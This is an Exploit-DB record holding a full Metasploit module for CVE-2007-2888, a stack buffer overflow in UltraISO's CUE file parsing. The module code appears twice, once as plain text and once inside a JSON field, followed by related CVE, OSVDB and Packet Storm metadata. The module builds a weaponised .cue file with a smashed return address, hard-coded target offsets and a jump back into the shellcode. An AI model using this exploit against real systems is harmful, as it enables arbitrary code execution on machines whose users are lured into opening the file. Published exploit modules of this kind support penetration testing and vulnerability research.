ID EDB-ID:16627 Type exploitdb Reporter metasploit Modified 2010-04-30T00:00:00
Description
UltraISO CUE File Parsing Buffer Overflow. CVE-2007-2888. Local exploit for windows platform
##
# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'UltraISO CUE File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EZB Systems, Inc's
UltraISO. When processing .CUE files, data is read from file into a
fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
can occur. Attackers can execute arbitrary code by convincing their victim
to open an CUE file.
NOTE: A file with the same base name, but the extension of "bin" must also
exist. Opening either file will trigger the vulnerability, but the files must
both exist.
},
'License' => MSF_LICENSE,
'Author' =>
[
'n00b', # original discovery
'jduck' # metasploit version
],
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2007-2888' ],
[ 'OSVDB', '36570' ],
[ 'BID', '24140' ],
[ 'URL', 'http://www.exploit-db.com/exploits/3978' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x22",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
# BOF @ 0x005e1f8b
# The EXE base addr contains a bad char (nul). This prevents us from
# writing data after the return address. NOTE: An SEH exploit was
# originally created for this vuln, but was tossed in favor of using
# the return address method instead. This is due to the offset being
# stable across different open methods.
[ 'Windows - UltraISO v8.6.2.2011 portable',
{
'Offset' => 1100,
'JmpOff' => 0x30, # offset from the end to our jmp
'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
}
],
[ 'Windows - UltraISO v8.6.0.1936',
{
'Offset' => 1100,
'JmpOff' => 0x30, # offset from the end to our jmp
'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 24 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),
], self.class)
end
def exploit
off = target['Offset']
jmpoff = target['JmpOff']
sploit = "\""
sploit << payload.encoded
sploit << rand_text_alphanumeric(off - sploit.length)
# Smashed return address..
sploit[off, 4] = [target.ret].pack('V')
# We utilize a single instruction near the end of the buffer space to
# jump back to the beginning of the buffer..
distance = off - jmpoff
distance -= 1 # dont execute the quote character!
jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
sploit[off - jmpoff, jmp.length] = jmp
sploit << ".BIN\""
cue_data = "FILE "
cue_data << sploit
cue_data << " BINARY\r\n"
cue_data << " TRACK 01 MODE1/2352\r\n"
cue_data << " INDEX 01 00:00:00\r\n"
print_status("Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...")
file_create(cue_data)
# create the empty BIN file
binfn = datastore['FILENAME'].dup
binfn.gsub!(/\.cue$/, '.bin')
out = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn))
File.new(out,"wb").close
print_status("Created empty output file #{out}")
end
end
{"hash": "83a98c94327ea7cc7735234fe8f8ab9edbe6819febe74c84926198c23595e470", "id": "EDB-ID:16627", "lastseen": "2016-02-02T06:07:08", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/16627/", "description": "UltraISO CUE File Parsing Buffer Overflow. CVE-2007-2888. Local exploit for windows platform", "title": "UltraISO CUE File Parsing Buffer Overflow", "sourceData": "##\r\n# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'UltraISO CUE File Parsing Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\r\n\t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\r\n\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\r\n\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\r\n\t\t\t\tto open an CUE file.\r\n\r\n\t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\r\n\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\r\n\t\t\t\tboth exist.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'n00b', # original discovery\r\n\t\t\t\t\t'jduck' # metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2888' ],\r\n\t\t\t\t\t[ 'OSVDB', '36570' ],\r\n\t\t\t\t\t[ 'BID', '24140' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/3978' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x22\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# BOF @ 0x005e1f8b\r\n\r\n\t\t\t\t\t# The EXE base addr contains a bad char (nul). This prevents us from\r\n\t\t\t\t\t# writing data after the return address. NOTE: An SEH exploit was\r\n\t\t\t\t\t# originally created for this vuln, but was tossed in favor of using\r\n\t\t\t\t\t# the return address method instead. This is due to the offset being\r\n\t\t\t\t\t# stable across different open methods.\r\n\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.2.2011 portable',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.0.1936',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'May 24 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\toff = target['Offset']\r\n\t\tjmpoff = target['JmpOff']\r\n\r\n\t\tsploit = \"\\\"\"\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alphanumeric(off - sploit.length)\r\n\r\n\t\t# Smashed return address..\r\n\t\tsploit[off, 4] = [target.ret].pack('V')\r\n\r\n\t\t# We utilize a single instruction near the end of the buffer space to\r\n\t\t# jump back to the beginning of the buffer..\r\n\t\tdistance = off - jmpoff\r\n\t\tdistance -= 1 # dont execute the quote character!\r\n\t\tjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\tsploit[off - jmpoff, jmp.length] = jmp\r\n\r\n\t\tsploit << \".BIN\\\"\"\r\n\r\n\t\tcue_data = \"FILE \"\r\n\t\tcue_data << sploit\r\n\t\tcue_data << \" BINARY\\r\\n\"\r\n\t\tcue_data << \" TRACK 01 MODE1/2352\\r\\n\"\r\n\t\tcue_data << \" INDEX 01 00:00:00\\r\\n\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...\")\r\n\t\tfile_create(cue_data)\r\n\r\n\t\t# create the empty BIN file\r\n\t\tbinfn = datastore['FILENAME'].dup\r\n\t\tbinfn.gsub!(/\\.cue$/, '.bin')\r\n\t\tout = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn))\r\n\t\tFile.new(out,\"wb\").close\r\n\t\tprint_status(\"Created empty output file #{out}\")\r\n\r\n\tend\r\n\r\nend\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-2888"], "published": "2010-04-30T00:00:00", "osvdbidlist": ["36570"], "references": [], "reporter": "metasploit", "modified": "2010-04-30T00:00:00", "href": "https://www.exploit-db.com/exploits/16627/"}
{"result": {"cve": [{"id": "CVE-2007-2888", "type": "cve", "title": "CVE-2007-2888", "description": "Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string (filename) in a .cue file, a related issue to CVE-2007-2761. NOTE: some details are obtained from third party information.", "published": "2007-05-29T21:30:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2888", "cvelist": ["CVE-2007-2888"], "lastseen": "2017-10-11T11:07:10"}], "exploitdb": [{"id": "EDB-ID:4001", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow Exploit", "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit. CVE-2007-2888. Local exploit for windows platform", "published": "2007-05-28T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4001/", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-01-31T19:52:52"}, {"id": "EDB-ID:3978", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow PoC", "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC. CVE-2007-2888. Dos exploit for windows platform", "published": "2007-05-24T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3978/", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-01-31T19:45:00"}], "osvdb": [{"id": "OSVDB:36570", "type": "osvdb", "title": "UltraISO CUE File Parsing FILE String Overflow", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25384](https://secuniaresearch.flexerasoftware.com/advisories/25384/)\nISS X-Force ID: 34485\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3978\n[CVE-2007-2888](https://vulners.com/cve/CVE-2007-2888)\nBugtraq ID: 24140\n", "published": "2007-05-24T13:33:47", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:36570", "cvelist": ["CVE-2007-2888"], "lastseen": "2017-04-28T13:20:32"}], "packetstorm": [{"id": "PACKETSTORM:87754", "type": "packetstorm", "title": "UltraISO CUE File Parsing Buffer Overflow", "description": "", "published": "2010-03-30T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/87754/UltraISO-CUE-File-Parsing-Buffer-Overflow.html", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-12-05T22:11:58"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ULTRAISO_CUE", "type": "metasploit", "title": "UltraISO CUE File Parsing Buffer Overflow", "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of \"bin\" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.", "published": "2010-03-29T17:21:15", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-2888"], "lastseen": "2018-03-11T17:13:41"}]}}
